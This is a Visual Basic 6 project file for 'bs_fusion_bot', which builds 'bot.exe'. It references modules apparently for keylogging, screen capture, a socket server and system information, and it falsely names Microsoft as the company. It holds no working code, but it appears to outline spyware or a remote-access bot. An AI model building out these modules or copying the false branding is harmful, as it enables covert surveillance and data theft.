Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\Windows\SysWOW64\stdole2.tlb#OLE Automation
Form=frmMain.frm
Module=modDeclarations; modDeclarations.bas
Module=mFuncs; mFuncs.bas
Module=mKLG; mKLG.bas
Module=mScreen; mScreen.bas
Module=mSckServer; mWinSocket32.bas
Module=mSckInfo; mSckInfo.bas
IconForm="frmMain"
Startup="frmMain"
HelpFile=""
ExeName32="bot.exe"
Path32="..\.."
Command32=""
Name="bs_fusion_bot"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Microsoft"
CompilationType=-1
OptimizationType=1
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
